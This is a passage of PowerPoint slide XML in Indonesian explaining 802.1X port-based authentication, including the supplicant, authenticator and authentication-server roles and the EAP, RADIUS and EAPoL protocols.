              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sakelar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meminta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>portnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. 802.1X </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akuntansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (AAA):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemohon-adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meminta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> PC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> laptop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Authenticator-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengalihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memvalidasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertindak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saluran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-server yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghubungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>direktori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>objek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memvalidasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeluarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penghitungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peristiwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 802.1X </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh dua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> yang Dapat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Diperluas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> (EAP)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> digital </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membangun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hubungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepercayaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terowongan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirimkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kartu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pintar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Panggil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Masuk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Jarak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> (RADIUS)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otentikator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengkomunikasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keputusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Autentikator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> RADIUS; server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server RADIUS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Ketika host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersambung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port switch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 802.1X, switch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> EAP over LAN (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>EAPoL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Port switch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengizinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
